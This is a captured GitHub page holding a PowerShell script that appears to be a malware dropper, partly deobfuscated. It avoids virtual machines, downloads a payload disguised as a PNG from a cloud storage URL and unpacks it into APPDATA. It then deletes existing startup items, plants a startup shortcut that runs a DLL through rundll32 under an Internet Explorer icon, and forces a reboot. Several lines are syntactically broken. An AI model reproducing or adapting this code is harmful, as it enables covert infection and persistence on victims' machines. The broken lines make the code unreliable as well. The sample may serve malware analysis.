Skip to content
Permalink
Branch: master
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
138 lines (133 sloc) 5.08 KB
$maliciou_file = "https://s3-eu-west-1.amazonaws.com/juremasobra2/image2.png"
_.dll = "_.dll"
_.prx = "_.prx"
MaxNotify = "MaxNotify"
function is_in_VM
{
# get system model
# anti-VM technique
$system_model = gwmi -Class Win32_ComputerSystem | select -ExpandProperty Model
if ($system_model -eq "VirtualBox" -or
$system_model -eq "VMware Virtual Platform" -or
$system_model -eq "Virtual Machine" -or
$system_model -eq "HVM domU")
{
return "Y"
}
else
{
return "N"
}
}
function get_random_str
{
try
{
$random_num = Get-Random -Minimum 1 -Maximum 9
$final_str = ""
For ($counter=0; $counter -le $random_num; $counter++)
{
seed_string = "qwertyuioplkjhgfdsazxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM"
nomeRandomico_getrandom = Get-Random -Minimum 1 -Maximum seed_string.Length
caractereRandomico = seed_string.Substring(nomeRandomico_getrandom, 1)
$final_str = $final_str + caractereRandomico
}
return $final_str
}
finally{}
}
function download_file($file_url, $file_path)
{
$web_service = New-Object "System.Uri" $ExecutionContext.InvokeCommand.ExpandString($file_url)
$http_client = [System.Net.HttpWebRequest]::Create($web_service)
$http_client.set_Timeout(15000)
$http_res = $http_client.GetResponse()
$content_len = [System.Math]::Floor($http_res.get_ContentLength()/1024)
$http_res_stream = $http_res.GetResponseStream()
$file_obj = New-Object -TypeName System.IO.FileStream -ArgumentList $file_path, Create
$read_content = new-object byte[] 10KB
$read_len = $http_res_stream.Read($read_content,0,$read_content.length)
$total_read_len = $read_len
while ($read_len -gt 0)
{
$file_obj.Write($read_content, 0, $read_len)
$read_len = $http_res_stream.Read($read_content,0,$read_content.length)
$total_read_len = $total_read_len + $read_len
}
$file_obj.Flush()
$file_obj.Close()
$file_obj.Dispose()
$http_res_stream.Dispose()
return "Y"
}
function create_lnk_file
{
Param([string]$lnk_file_path,[string]$target_argument);
try{
$wshell_obj = New-Object -ComObject WScript.Shell
$shortcut_lnk_file = $wshell_obj.CreateShortcut($lnk_file_path)
$shortcut_lnk_file.TargetPath = 'powershell'
$shortcut_lnk_file.Arguments = $ExecutionContext.InvokeCommand.ExpandString("$target_argument")
$shortcut_lnk_file.WorkingDirectory = "%SystemRoot%\System32"
$shortcut_lnk_file.WindowStyle = 7
$shortcut_lnk_file.IconLocation = "%ProgramFiles%\Internet Explorer\iexplore.exe,1"
$shortcut_lnk_file.Save()
}finally{}
}
function create_mutex
{
try
{
$mutex_obj = New-Object System.Threading.Mutex($false, "444444444444")
return $mutex_obj.WaitOne()
}finally{}
}
# Main Code body
if (is_in_VM -eq "N") {
if (create_mutex) {
stop-process -name wmplayer
$APP_DATA_PATH = ${env:APPDATA}+"\"
$random_str = get_random_str
$dropfile_txt = $APP_DATA_PATH + $random_str + ".txt"
${/=\__/=\___/===\_} = $APP_DATA_PATH + $random_str + ".vbs"
sleep -s 1
$counter = $false
while($counter -ne $true) {
download_file $maliciou_file $dropfile_txt; sleep -s 1
if ((gi $dropfile_txt).length -gt 2048kb){
$counter = $true
$is_download_complete = "Y"
}else{
$is_download_complete = "N"
}
Write-Host $counter
}
$is_download_complete = "Y"
if ($is_download_complete -eq "Y") {
$dropfile_zip_new_name = $APP_DATA_PATH+$random_str + ".zip"
ren -Path $ExecutionContext.InvokeCommand.ExpandString("$dropfile_txt") -NewName $ExecutionContext.InvokeCommand.ExpandString("$dropfile_zip_new_name");
$cmd_shell_obj = New-Object -ComObject shell.application
$zip_folder = $cmd_shell_obj.NameSpace($dropfile_zip_new_name)
foreach ($folder_file in $zip_folder.items()){
$cmd_shell_obj.Namespace($APP_DATA_PATH).CopyHere($folder_file)
}
sleep -s 3
$randome_str_1 = get_random_str
$prx_file = $randome_str_1 + ".prx"
$dll_file = $randome_str_1 + "_.dll"
ren -Path $ExecutionContext.InvokeCommand.ExpandString("$env:APPDATA\${_/\/\_/\_/=\/====}") -NewName $ExecutionContext.InvokeCommand.ExpandString("$env:APPDATA\$dll_file");
ren -Path $ExecutionContext.InvokeCommand.ExpandString("$env:APPDATA\${_/\____/=\/\_/===}") -NewName $ExecutionContext.InvokeCommand.ExpandString("$env:APPDATA\$prx_file");
sleep -s 3
cd $env:APPDATA ;
shellObjeto = New-Object -Com WScript.Shell
$startup_folder = shellObjeto.SpecialFolders.Item("startup");
del $startup_folder\*.vbs
del $startup_folder\*.lnk
$target_args = $ExecutionContext.InvokeCommand.ExpandString("cd $env:APPDATA; Start-Process rundll32.exe $dll_file, ${___/=\/\/\_____/=}")
$target_lnk_file_path = $ExecutionContext.InvokeCommand.ExpandString("$startup_folder\$prx_file.lnk")
create_lnk_file $target_lnk_file_path $target_args
sleep -s 40
Restart-Computer -Force
}
}
}
You can’t perform that action at this time.